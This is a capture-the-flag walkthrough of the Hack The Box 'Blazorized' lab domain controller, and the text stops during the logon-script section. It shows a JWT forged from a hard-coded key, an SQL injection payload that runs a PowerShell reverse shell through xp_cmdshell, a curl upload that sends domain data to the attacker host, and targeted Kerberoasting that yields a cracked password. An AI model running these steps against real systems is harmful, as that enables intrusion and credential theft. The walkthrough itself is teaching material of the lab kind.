Blazorized
Initial Enumeration¶
Nmap Scan¶
We start off with Nmap and a scan with the -p- and --min-rate 1000 flags to get an overview of the open ports. Once we have a list we run a deeper scan on the discovered open ports to get the services/versions and run some default scripts.
$ sudo nmap -p- --min-rate 10000 10.129.231.74 -oN scans/all-ports-tcp.nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 22:17 CET
Nmap scan report for 10.129.231.74
Host is up (0.031s latency).
Not shown: 65507 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49673/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49684/tcp open unknown
49691/tcp open unknown
49698/tcp open unknown
49722/tcp open unknown
49776/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 10.14 seconds
$ sudo nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001 -sC -sV 10.129.231.74 -oN scans/tcp-detailed.nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 22:18 CET
Nmap scan report for 10.129.231.74
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-17 21:18:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.129.231.74\BLAZORIZED:
| Instance name: BLAZORIZED
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
| TCP port: 1433
|_ Clustered: false
| ms-sql-ntlm-info:
| 10.129.231.74\BLAZORIZED:
| Target_Name: BLAZORIZED
| NetBIOS_Domain_Name: BLAZORIZED
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: blazorized.htb
| DNS_Computer_Name: DC1.blazorized.htb
| DNS_Tree_Name: blazorized.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-17T21:18:43+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-17T21:15:45
|_Not valid after: 2055-01-17T21:15:45
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-17T21:18:38
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds
- Active Directory Domain Controller (LDAP)
- Domain name:
blazorized.htb - Host name:
DC1 - HTTP 80/TCP (redirect to
http://blazorized.htb) - MSSQL Server 1433/TCP
We add everything to our /etc/hosts file and move on to enumerating the website on 80/TCP.
Port 80/TCP¶
During manual enumeration we find the website being a static website and using Blazor WebAssembly.
We continue by fuzzing for virtual hosts using FFuF and discover the admin.blazorized.htb virtual host.
$ ffuf -u http://blazorized.htb -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.blazorized.htb" -fs 144
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://blazorized.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt
:: Header : Host: FUZZ.blazorized.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 144
________________________________________________
admin [Status: 200, Size: 2047, Words: 149, Lines: 28, Duration: 39ms]
:: Progress: [151265/151265] :: Job [1/1] :: 1129 req/sec :: Duration: [0:01:47] :: Errors: 0 ::
Adding it to our /etc/hosts file and navigating to it we get access to the Super Admin login form.
We can try some weak credentials, but to no avail. We will continue researching and enumerating about Blazor itself.
Researching & Enumerating Sensitive Files in Blazor¶
After doing some research about Blazor using the Microsoft Docs, we eventually come across the blazor.boot.json resource file, which contains a manifest of the files that make up the web application itself (see here). We also know through research on the documentation, that the static web assets are stored inside the _framework folder. Conveniently the blazor.boot.json is stored there as well and we curl it to the contents of it. This reveals the full list of .dll files used by the web application.
$ curl -s 'http://blazorized.htb/_framework/blazor.boot.json'
{
"cacheBootResources": true,
"config": [ ],
"debugBuild": false,
"entryAssembly": "Blazorized.DigitalGarden",
"icuDataMode": 0,
"linkerEnabled": true,
"resources": {
"assembly": {
"Blazored.LocalStorage.dll": "sha256-5V8ovY1srbIIz7lzzMhLd3nNJ9LJ6bHoBOnLJahv8Go=",
"Blazorized.DigitalGarden.dll": "sha256-YH2BGBuuUllYRVTLRSM+TxZtmhmNitErmBqq1Xb1fdI=",
"Blazorized.Shared.dll": "sha256-Bz\/iaIKjbUZ4pzYB1LxrExKonhSlVdPH63LsehtJDqY=",
"Markdig.dll": "sha256-\/zBLNTAFSwzmj9Qq3hOzX4jN+IzlZOPHCL3qEU4t8BQ=",
"Microsoft.AspNetCore.Components.dll": "sha256-q\/vMB0OEwpfgaAe0kahnXQUPQ5ux0ryaY2BXkF22E8Y=",
"Microsoft.AspNetCore.Components.Forms.dll": "sha256-ilsozHMhNmrU5XRQkeYzpGDYHyLUQXPUW4Hh4D7ueZ4=",
"Microsoft.AspNetCore.Components.Web.dll": "sha256-KWEr4EaQSjbTnpfqEN\/6Nl330iwzKzUAkJlJ1BpK\/MU=",
"Microsoft.AspNetCore.Components.WebAssembly.dll": "sha256-Ej9bH2qZK\/yyvACie45LB5PgSAlH0sPfZjnHKyBY1MA=",
"Microsoft.Extensions.Configuration.Abstractions.dll": "sha256-X\/f4fDl2cuIRXeWHhK\/f2UqQbFioD+RU4a4CEh0zrrQ=",
"Microsoft.Extensions.Configuration.dll": "sha256-DBOKSPriP2JDxVbbWrLXyD3K4\/x3RBifNBWk\/q1I39M=",
"Microsoft.Extensions.Configuration.Json.dll": "sha256-Q5AqJneA2TZnzC0IYzBx6j\/tHRhWAeMbpH3BsV7KgWg=",
"Microsoft.Extensions.DependencyInjection.Abstractions.dll": "sha256-3dT6SSIGGrs8Me0BhM7OKQNnZgPiMpzxJxbKZg9+PPk=",
"Microsoft.Extensions.DependencyInjection.dll": "sha256-qi0kE7rp0kdsNqdL6DyPZEeimjUGvcLT4iWQX0YnRus=",
"Microsoft.Extensions.Http.dll": "sha256-rZWnWVD6nK+nRjxDQYWLF5GE9vGvT14HtIoM\/0PlVd0=",
"Microsoft.Extensions.Localization.Abstractions.dll": "sha256-HmuAsUnHX2mxnAL703FjrEbwGneVw5Q96ZGBg3m7xEw=",
"Microsoft.Extensions.Localization.dll": "sha256-oL+8vEgiohIU\/VOsIukfsaS53JGMyOPV5Grr6Zd6TSk=",
"Microsoft.Extensions.Logging.Abstractions.dll": "sha256-+5dUbJ9ffsgK5RahPCQeMw5x76+LlE6F9dqvF2FoBHg=",
"Microsoft.Extensions.Logging.dll": "sha256-Sezvu1SpB+vPfYWMQ+LQtRpFvN9Ym3AvPDnKYCKxL14=",
"Microsoft.Extensions.Options.dll": "sha256-k9XISCK5fk9IUDDKqLl\/+QFebprK5dgTjSKpE\/Zpz8Q=",
"Microsoft.Extensions.Primitives.dll": "sha256-eXvGx2jcjpTPEJoAHBsW\/VuMPbNyyU+AsuhPmkzSSRY=",
"Microsoft.IdentityModel.Abstractions.dll": "sha256-a1daKYknMuF16uFadrwL8fjYxiN83JCr285kxf6l1SI=",
"Microsoft.IdentityModel.JsonWebTokens.dll": "sha256-ZceT+VyXrVMCCQx7ghNz4BXbpCkOZwHTSkPikk1tYfg=",
"Microsoft.IdentityModel.Logging.dll": "sha256-yUKJ+ALshaP1bgyC3HBJYhvWi8ZO89OQq1D6xzUcsjA=",
"Microsoft.IdentityModel.Tokens.dll": "sha256-kci9vmm4cxzxjfLH7gBsdkuSD95idJws2K27ijmaMqg=",
"Microsoft.JSInterop.dll": "sha256-3OzHtLOp\/ABrxbs+cwoO9uxU3d1YqRrcP6MgKAWKCOQ=",
"Microsoft.JSInterop.WebAssembly.dll": "sha256-4cMfifCYL\/bv5qiC8T6HyABhOewZlTXovRc+E\/CrUbc=",
"MudBlazor.dll": "sha256-BCkPqJ+DM7hJKpuUnFQY98YKaIwoRWyqzw8JkUBKQf0=",
"MudBlazor.Markdown.dll": "sha256-6eL9fPi7IlrwF4XROmZgloTtnqKEqzak7Aew1tykYPI=",
"System.Collections.Concurrent.dll": "sha256-VJZ+9mtVjI3oFnHaOcs7QQWwE1tpcmsn\/Fbf1ss51EE=",
"System.Collections.dll": "sha256-PcqW0HOMhSsdhOuo97PP73z311WvAUQjMNlDxO0YNvg=",
"System.ComponentModel.Annotations.dll": "sha256-p3FeLGazqadK+YWA5aMJEwKQP4\/CX0gumrfPLmaMmss=",
"System.ComponentModel.dll": "sha256-Fk2YdbIh1S9I3Jn+elQpV9RdU2OqJiVenl74EbfuW34=",
"System.ComponentModel.Primitives.dll": "sha256-f2JppNaTVR3r2YAWy4aA5vx0Ouy5xoW17tkOh8su2Wc=",
"System.ComponentModel.TypeConverter.dll": "sha256-z8NaAg44tOD7RGtFlQNGs6GywkgWXfQxiH9IJyUJaBs=",
"System.Console.dll": "sha256-Z0qITFiDb6P2gyaZV9Ku42+3y\/8YwgfrxLnEDp5E15s=",
"System.dll": "sha256-GXYaTkUWqIcsGI6VKD2SIHDrRwOD2xQU1UA9nONh8PU=",
"System.Formats.Asn1.dll": "sha256-V5AtfHy4i4TRClZ4wQZ7hPz5VgLdBCZQYasU5aJR9D0=",
"System.IdentityModel.Tokens.Jwt.dll": "sha256-6UnGv5ruxREG0Pk32MuWFOFjcqcvYNuinJcJaBXPnRA=",
"System.IO.Compression.dll": "sha256-6oQKWB3LN6lvKLNpYiIalauJCy2YonpZ7QBLAmoMCao=",
"System.Linq.dll": "sha256-YuUMLuHQ4VWrIe8ecXrKp6f8BFkPKwTInHAFtRspY3A=",
"System.Linq.Expressions.dll": "sha256-krU0mE+qHN23mrVgI0s\/99oAYEHtztkgJ59u0Uy+x6c=",
"System.Memory.dll": "sha256-+MXdUexgKsH1w9XI5G8BWxuEY0tKIAD+xuE1kO1lYbA=",
"System.Net.Http.dll": "sha256-5YDY3emMx3szDVfae1lDDlTPXH3VB1apmM8hECmSQR4=",
"System.Net.Http.Json.dll": "sha256-CG\/PL04ZZqfHAYQdh\/5IJKbcNSUSDUXbz6ZYqyJ5cPM=",
"System.Net.Primitives.dll": "sha256-eNUKNz+XLN5pHDhz0TRrSWVzwD7sT8fHO\/iPmRMMcmw=",
"System.ObjectModel.dll": "sha256-rCCEEgfTj3ifxigXAW8vpXI2xDFjBeDcFTeEeQRCxGs=",
"System.Private.CoreLib.dll": "sha256-duCS2lpNXrvF\/sII\/ROPczy30vEs54dkJG+WagUjwU8=",
"System.Private.Uri.dll": "sha256-QUp9pgVKRli5\/xLQf5zWfHAD1KRUEi3RgO1D6HY2SHk=",
"System.Private.Xml.dll": "sha256-ApyqBjTVBbNCyZJP0aNRxd1cJdyLNpElRVs622uuJ54=",
"System.Runtime.CompilerServices.Unsafe.dll": "sha256-ioMG7tdGMQuJXQaFEifb58Wo9nhzQ138YPF3FjXFKso=",
"System.Runtime.dll": "sha256-2oCgFx36GBC0xZjd1hl5ZQXxw8zwZ00R\/SxrGu6Qy\/4=",
"System.Runtime.InteropServices.dll": "sha256-ZnOr3qdZamAmXJoClwtU11aePkDpbPGGRXGGVZq+qss=",
"System.Runtime.InteropServices.JavaScript.dll": "sha256-K56cee2Wp0fFNOLSZjwAZWsvsexfPJ8Fc\/rP97RFSG0=",
"System.Runtime.Intrinsics.dll": "sha256-RNcogVfdvH7r++k9\/Sbs9aGp2Tsky8bIOWUFHl+j4jo=",
"System.Runtime.Numerics.dll": "sha256-+oHtVeVcUysD56UQYTTLJ3BnD9766uThPNHg700sxu0=",
"System.Security.Claims.dll": "sha256-i6iOwZtEGi1jKX5BS7V4Kk8mECmyZ8l49ewkm9Ik64E=",
"System.Security.Cryptography.Algorithms.dll": "sha256-RLpI4SG0X+BmJMzdnl6YDepqNNnezyDys3pyTGWlEkI=",
"System.Security.Cryptography.Cng.dll": "sha256-\/p2zCahEBOv3gbqd9XHRwVrL\/fUq8tH43+kjm7i1J\/I=",
"System.Security.Cryptography.Csp.dll": "sha256-5kZPZt\/Q7PijslxzV+248xs\/IheEIclYiOI+4XMCbLM=",
"System.Security.Cryptography.dll": "sha256-A0EGy+fyvbI6PCM1gzdpr\/jNhfYS5deVqnMdth3sLWA=",
"System.Security.Cryptography.Encoding.dll": "sha256-TLpkd3NtthEaWBqHHShAVwYUIf26TiT4fO86Hig94Js=",
"System.Security.Cryptography.Primitives.dll": "sha256-JILevD8ua6+qLJj8fU9Xymuzm2vr701AQnCKSlCKLjE=",
"System.Security.Cryptography.X509Certificates.dll": "sha256-Tt6t3gSGKhS6w1kcDylF6h1UA+FrRey75wv1Dr88Ctc=",
"System.Text.Encodings.Web.dll": "sha256-lwzvCAdo+KGRqRiuotyXVHSbpe7fuNSGMM0OMK0VbPk=",
"System.Text.Json.dll": "sha256-ZgCOtGviIgH5dm9k+o2H8tL+gga3BjBCdmpl16zI2Xs=",
"System.Text.RegularExpressions.dll": "sha256-A0Xkv8sUH8DOBuAI5Jwc9XCl\/F4IeSM57\/tzPba6HEU=",
"System.Threading.dll": "sha256-J1ieNAafmr6H5LOMxJMuRKh3LGKtmT2upEU\/c5tnt68=",
"System.Threading.Thread.dll": "sha256-pLV9qpTnD4J45AaN\/Z3QTnTPFGQwMI4mFEJaij83X3Q=",
"System.Xml.ReaderWriter.dll": "sha256-9yumv+5QaTSARQB46DStO9vcXQyA3cPvv74jAta3lQA="
},
"extensions": null,
"lazyAssembly": {
"Blazorized.Helpers.dll": "sha256-ekLzpGbbVEn95uwSU2BGWpjosCK\/fqqQRjGFUW0jAQQ="
},
"libraryInitializers": null,
"pdb": null,
"runtime": {
"dotnet.7.0.15.x46e81vra7.js": "sha256-MHuxwxeVFybuBBTAWeZrvoStZpW+H4ThSaRcFvrfqXM=",
"dotnet.timezones.blat": "sha256-aHk3Pm2JXopn6UPLJtovAqIdIk8GyIMzGm450cli9UE=",
"dotnet.wasm": "sha256-fMuaMGy\/7q8rXL+GyH9Gu04mJDwQ\/OSYXD9ezf+Fz4k=",
"icudt_CJK.dat": "sha256-SZLtQnRc0JkwqHab0VUVP7T3uBPSeYzxzDnpxPpUnHk=",
"icudt_EFIGS.dat": "sha256-8fItetYY8kQ0ww6oxwTLiT3oXlBwHKumbeP2pRF4yTc=",
"icudt_no_CJK.dat": "sha256-L7sV7NEYP37\/Qr2FPCePo5cJqRgTXRwGHuwF5Q+0Nfs=",
"icudt.dat": "sha256-tO5O5YzMTVSaKBboxAqezOQL9ewmupzV2JrB5Rkc8a4="
},
"runtimeAssets": {
"dotnet.wasm": {
"behavior": "dotnetwasm",
"hash": "sha256-fMuaMGy\/7q8rXL+GyH9Gu04mJDwQ\/OSYXD9ezf+Fz4k="
}
},
"satelliteResources": null
}
}
We download the discovered files, most importantly the Blazorized.Helpers.dll file using curl.
Exploitation¶
Decompiling DLLs¶
Spin up a Windows host to use dnSpy to decompile the DLL files. Once decompiled we will find very interesting information saved at the JWT class for the Blazorized.Helpers.dll file. It has the JWT security key hard-coded as a variable as well as the claims as the class' member variables.
Furthermore we discover the algorithm used for the JWT through the VerifyJWT function.
We can also find out what exact values we need in order to craft a Super Admin JWT by looking at the GenerateSuperAdminJWT function.
Generate JWT¶
We now have all the information needed to generate a Super Admin JWT. We know the values for the iss and aud registered claims as well as the custom claims values for role and emailaddress. In addition we have the security key and the encryption algorithm. The last thing needed is to convert the expiration date of the JWT to epoch format.
To generate the JWT with this information, we use the jwt.io.
We add all the information, the to-epoch converted expiration date of the JWT and the secret key under VERIFY SIGNATURE. Next copy the encoded token and add it to our local storage in our browser for the http://admin.blazorized.htb website.
Upon refreshing the page we successfully get authenticated to the Super Admin Panel.
SQL Injection¶
We enumerate the newly unlocked functionalities and eventually find an SQL Injection vulnerability for the Check Duplicate Category Names functionality.
If we enter some expected category name, we get the expected response:
However using the following payload (sqli' 1=1-- -), we can confirm SQL injection as being possible, since it retrieved all the category names.
Since we know this is an MSSQL database, we continue by trying to execute commands using the xp_cmdshell in hopes that we are a privileged user to do so. We find out it is already enabled so we continue with preparing a payload in order to obtain a reverse shell connection.
We craft a base64 encoded PowerShell command using revshells and start our listener on our attack host. Next we issue the payload sqli'; EXEC xp_cmdshell 'powershell.exe -e <BASE64>'-- -.
And we successfully get a reverse shell connection established on the DC1 host as domain user nu_1055.
$ rlwrap -cAr nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.16.33] from (UNKNOWN) [10.129.231.74] 60584
PS C:\Windows\system32> whoami
blazorized\nu_1055
PS C:\Windows\system32> hostname
DC1
The user flag can now be found at C:\Users\NU_1055\Desktop\user.txt
AD Exploitation¶
We start a web server on our attack host to transfer over the SharpHound tool in order to gather information about the Active Directory domain.
And we download it to the victim host using curl.
Next we run it to collect all the information and save it as a ZIP file.
PS C:\Programdata\xpltive> .\SharpHound.exe -c All --zipfilename blazorized
2025-01-17T17:35:48.0030205-06:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2025-01-17T17:35:48.1749202-06:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-01-17T17:35:48.2061451-06:00|INFORMATION|Initializing SharpHound at 5:35 PM on 1/17/2025
2025-01-17T17:35:48.3155085-06:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for blazorized.htb : DC1.blazorized.htb
2025-01-17T17:35:48.4405138-06:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-01-17T17:35:48.5967695-06:00|INFORMATION|Beginning LDAP search for blazorized.htb
2025-01-17T17:35:48.6436574-06:00|INFORMATION|Producer has finished, closing LDAP channel
2025-01-17T17:35:48.6436574-06:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-01-17T17:36:18.7530508-06:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2025-01-17T17:36:34.6748818-06:00|INFORMATION|Consumers finished, closing output channel
2025-01-17T17:36:34.7061341-06:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-01-17T17:36:34.8936755-06:00|INFORMATION|Status: 110 objects finished (+110 2.391304)/s -- Using 43 MB RAM
2025-01-17T17:36:34.8936755-06:00|INFORMATION|Enumeration finished in 00:00:46.3006387
2025-01-17T17:36:34.9717551-06:00|INFORMATION|Saving cache with stats: 70 ID to type mappings.
70 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2025-01-17T17:36:34.9873843-06:00|INFORMATION|SharpHound Enumeration Completed at 5:36 PM on 1/17/2025! Happy Graphing!
And we start an upload server on our attack host in order to transfer the ZIP from the victim to us.
Finally we transfer the ZIP file containing the domain information over using curl.
PS C:\Programdata\xpltive> cmd /c curl -X POST -F "files=@20250117173634_blazorized.zip" http://10.10.16.33:1081/upload
Importing the ZIP archive into our BloodHound application, we see that we have WriteSPN rights on user rsa_4810.
Targeted Kerberoasting & Lateral Movement to rsa_4810¶
We can abuse this configuration by performing a targeted Kerberoasting attack. To do so we first have to transfer over PowerView to the victim host. After doing so we use the Set-DomainObject functionality of it to set a "bogus" service principal name to the rsa_4810 user. This in turn allows us to request the Kerberos TGS ticket of the user (using Get-DomainSPNTicket function) and finally attempt to crack it to obtain clear-text credentials.
PS C:\Programdata\xpltive> Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='doesnt/MATTER'}
PS C:\Programdata\xpltive> Get-DomainUser -Identity rsa_4810 -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Select-Object -ExpandProperty Hash
$krb5tgs$23$*RSA_4810$blazorized.htb$doesnt/MATTER*$B443879BFD6B5AE278B97BCC90779BE9$D9434675A5263EE085C9F815E963EECD15C25478ADACA311549185B767A17450BC07EFCF764D52AE2CE1AE8BC5612F4140A4CB0C15760F59709EEE9550545644C95215D4CAD77DEBB84FB032AED0D863DE47842546A72B077D14928F1DF224788D372BD5FAF1633D981ECC2F12439CF1F290323AF244AF70230825B0EA26D13154A6A37360706089343E2C644515E08EA204D3EF7935FB26DA513AD5672084127A0093B2CB238C8C227ADFF53FB18255E745A32790706F1780EEA99B19F2C072C4802FFB8F00867B32E3EB0656D81B5D0A9432531E6599C0C05E0154B5DF565EEB8E48774C5FA64856E104CD87F4059FD8452C7E7306413612FF0E339EBAE665B33346919806C9E10AAAA10D128B475A063BD1259710F1C5DFA308B2CE97EA3F3358688015CDAF54AC2F8555D3A4AEE0761B4FB8A184681C6204034C0F0117E035B1866EBF76AEFF1FEAAC16107DE6A0EFF6255953C9F2516A427878B55D75A0FF1AB6E0CC2E878198531008E9FB7781FFAA50A8030DAEC1470B5B348CF7760E06184F2EA36C6B29FB1CAC4B88E7AADE2C813C462062698F82AD5C36855E1738A739BCB52A16EFD0119228F4F7B370089AEC9476E1E556E4EC021D0164905F1D7D2945FC1CC939AB77EF59431FA17498BBBD956B3E8111CCFB71146D5A4A2FAB53A43F5D44A7E8279E786B0819EF69CD3B00574D6908BF3AD565B24876242D6BA95B04CBB326F38BE2108B049136AF294E5ECA0C1F0254E397FE8C7DC579F607C9720AA4B4FEF8AE8EA6B2DFCDC1542C958568B9B47DAE8B4BAFB6E742B6D8174DFEE1D653B3D0E496E0DC0A8B7961B72A73993F3B82FAB9B59DD6FC7D527A1ECF38146DC646B32A48DACCA8844F6E6A9CECC06FEF3EDA464FBBDF00BDB27C6D29718535D77BA6F9C0D45410634878CF86A88C2BF8CF8C7D2AD007A2152826C656E822384D00D93176FF4A23742483E2E3D1E097C76FEE190431F83239440A87ECC3526698D136DC1D58221D387DB4432F122D5633706D0357D3F0D0F97DBB43B505B6775164502AFFD20B0DB63B7B68E9AC35A831F62A2420A63288940267E29A072A2E253F8E0FA3DD9EC4F8ABFA7B6D0BCF9F9D8450FF6F0F249D5940067B53BD1CFC677A576E1632BCA45F0CF158321FBC82EECC75A1A192CCF6A488A2C6AB7F70CF8C5A6CAEA093889CC490934353DF20D1EE40A8BF90B16A28802FCEE23774B9FFE81B29AF5E443F5656A68589B717F3B0523C82E7918097C9BE1832BB9CD60521374A2C2C276B8393A3990F605EFF98D5113C7CE8928FF25B562623CB9A1255DDF8E0E5F3D0DF44D180CBC9F88952FD64BFDA2E4B2B2D00EB46337069D6320D77900391D98D107CC5D2E85468B5824D51E15C8633F70CB3FB870A36A53AE195D428F5D8E5B032995E9D5CAE7CF21DA3338F8787706F00C7B849C7E2A7EA9DC31B7363F8BBE3F71CF02114BEDB7DF24E382795A36D6666B16B18A6CD716178E8AF317DA4F8120ACDF4BD3D11EBA8941964F3268B31B3E978E3E735ACBC27427B704FFC6E7D6A980B05B94E205A860140DA39303D72D91C41A2360888F36DAD34763394CA1B5D836CE0E11CAD88BA0FDD46DBD86BA078FEAA7EF568F0F07FAA6337125AFAF404AA0B1543029F2FB65DE5CDF95CC1C7FDB2AC7D8653DB9AABB20CCF8B2EF370E21CD7E0E96CEFE4057A431332BF35D61CBFB55279C094266F7BCF6633FDC4B29E039F8374A731BD3C99A2FB597CDA3C2D1C5B5CF17B15727AB2EB6D5D428E83
We copy the TGS ticket obtained and crack it using Hashcat.
$ ./hashcat --identify hashes/blazorized/rsa_4810.tgs
<--SNIP-->
$krb5tgs$23$*RSA_4810$blazorized.htb$doesnt/MATTER*$b443879bfd6b5ae278b97bcc90779be9$d9434675a5263ee085c9f815e963eecd15c25478adaca311549185b767a17450bc07efcf764d52ae2ce1ae8bc5612f4140a4cb0c15760f59709eee9550545644c95215d4cad77debb84fb032aed0d863de47842546a72b077d14928f1df224788d372bd5faf1633d981ecc2f12439cf1f290323af244af70230825b0ea26d13154a6a37360706089343e2c644515e08ea204d3ef7935fb26da513ad5672084127a0093b2cb238c8c227adff53fb18255e745a32790706f1780eea99b19f2c072c4802ffb8f00867b32e3eb0656d81b5d0a9432531e6599c0c05e0154b5df565eeb8e48774c5fa64856e104cd87f4059fd8452c7e7306413612ff0e339ebae665b33346919806c9e10aaaa10d128b475a063bd1259710f1c5dfa308b2ce97ea3f3358688015cdaf54ac2f8555d3a4aee0761b4fb8a184681c6204034c0f0117e035b1866ebf76aeff1feaac16107de6a0eff6255953c9f2516a427878b55d75a0ff1ab6e0cc2e878198531008e9fb7781ffaa50a8030daec1470b5b348cf7760e06184f2ea36c6b29fb1cac4b88e7aade2c813c462062698f82ad5c36855e1738a739bcb52a16efd0119228f4f7b370089aec9476e1e556e4ec021d0164905f1d7d2945fc1cc939ab77ef59431fa17498bbbd956b3e8111ccfb71146d5a4a2fab53a43f5d44a7e8279e786b0819ef69cd3b00574d6908bf3ad565b24876242d6ba95b04cbb326f38be2108b049136af294e5eca0c1f0254e397fe8c7dc579f607c9720aa4b4fef8ae8ea6b2dfcdc1542c958568b9b47dae8b4bafb6e742b6d8174dfee1d653b3d0e496e0dc0a8b7961b72a73993f3b82fab9b59dd6fc7d527a1ecf38146dc646b32a48dacca8844f6e6a9cecc06fef3eda464fbbdf00bdb27c6d29718535d77ba6f9c0d45410634878cf86a88c2bf8cf8c7d2ad007a2152826c656e822384d00d93176ff4a23742483e2e3d1e097c76fee190431f83239440a87ecc3526698d136dc1d58221d387db4432f122d5633706d0357d3f0d0f97dbb43b505b6775164502affd20b0db63b7b68e9ac35a831f62a2420a63288940267e29a072a2e253f8e0fa3dd9ec4f8abfa7b6d0bcf9f9d8450ff6f0f249d5940067b53bd1cfc677a576e1632bca45f0cf158321fbc82eecc75a1a192ccf6a488a2c6ab7f70cf8c5a6caea093889cc490934353df20d1ee40a8bf90b16a28802fcee23774b9ffe81b29af5e443f5656a68589b717f3b0523c82e7918097c9be1832bb9cd60521374a2c2c276b8393a3990f605eff98d5113c7ce8928ff25b562623cb9a1255ddf8e0e5f3d0df44d180cbc9f88952fd64bfda2e4b2b2d00eb46337069d6320d77900391d98d107cc5d2e85468b5824d51e15c8633f70cb3fb870a36a53ae195d428f5d8e5b032995e9d5cae7cf21da3338f8787706f00c7b849c7e2a7ea9dc31b7363f8bbe3f71cf02114bedb7df24e382795a36d6666b16b18a6cd716178e8af317da4f8120acdf4bd3d11eba8941964f3268b31b3e978e3e735acbc27427b704ffc6e7d6a980b05b94e205a860140da39303d72d91c41a2360888f36dad34763394ca1b5d836ce0e11cad88ba0fdd46dbd86ba078feaa7ef568f0f07faa6337125afaf404aa0b1543029f2fb65de5cdf95cc1c7fdb2ac7d8653db9aabb20ccf8b2ef370e21cd7e0e96cefe4057a431332bf35d61cbfb55279c094266f7bcf6633fdc4b29e039f8374a731bd3c99a2fb597cda3c2d1c5b5cf17b15727ab2eb6d5d428e83:(Ni7856Do9854Ki05Ng0005 #)
<--SNIP-->
It successfully cracks with the password (Ni7856Do9854Ki05Ng0005 #). The compromised user rsa_4810 is also part of the REMOTE MANAGEMENT USERS group and thus we can authenticate via WinRM to the DC1 host (discovered during Nmap scan).
We will use Evil-WinRM to establish the connection.
$ evil-winrm -i dc1.blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami
blazorized\rsa_4810
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> hostname
DC1
Writing Logon Script & Lateral Movement to ssa_6010¶
Having code execution as domain user rsa_4810, we go back to our BloodHound data and also discover the compromised user as being in a non-standard group called REMOTE_SUPPORT_ADMINISTRATORS.
